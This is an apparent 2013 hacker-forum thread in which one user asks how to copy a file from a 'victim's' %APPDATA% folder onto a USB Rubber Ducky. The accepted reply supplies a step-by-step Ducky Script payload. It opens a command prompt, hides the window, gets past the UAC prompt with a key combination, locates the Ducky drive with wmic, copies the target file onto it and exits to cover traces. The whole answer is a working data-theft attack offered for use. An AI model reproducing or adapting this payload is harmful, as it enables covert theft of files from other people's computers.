Scurvey Posted April 9, 2013 Share Posted April 9, 2013 I am trying to make a script that will copy a file from the %APPDATA%\ on the victims computer to the usb rubber ducky. What is the best way of going about this? Quote Link to comment Share on other sites More sharing options...
Solution overwraith Posted April 10, 2013 Solution Share Posted April 10, 2013 (edited) I would probably go to https://github.com/hak5darren/USB-Rubber-Ducky/wiki and get a payload script to start up and hide the command prompt from the payloads page (make sure you have correct encoder): REM Target: WINDOWS VISTA REM Encoder V2.4 REM Purpose: Hide cmd window script that uses a key combo to circumvent UAC limitations. DELAY 3000 CONTROL ESCAPE DELAY 500 STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 CTRL-SHIFT ENTER DELAY 1000 ALT C DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER then I would change directories to %APPDATA%: STRING cd %APPDATA% ENTER Then I would use the popular command for finding a drive labeled ducky on twin duck firmware ducky (Make sure you have installed twin duck firmware) (also, you may have problems here if the ducky mounts slowly, tell me if you have problems): STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d ENTER Then I would use the copy command using the variable of the drive determined in the previous bit of code in variable "myd": STRING copy %APPDATA%\target_file %myd%\ ENTER When all finished run the exit command to close the conspicuous command prompt: STRING EXIT ENTER Run it a step at a time to make sure everything works, because I haven't tested this code all together yet. The hide command window has been tested, I don't see much that could go wrong. Edited April 10, 2013 by overwraith Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.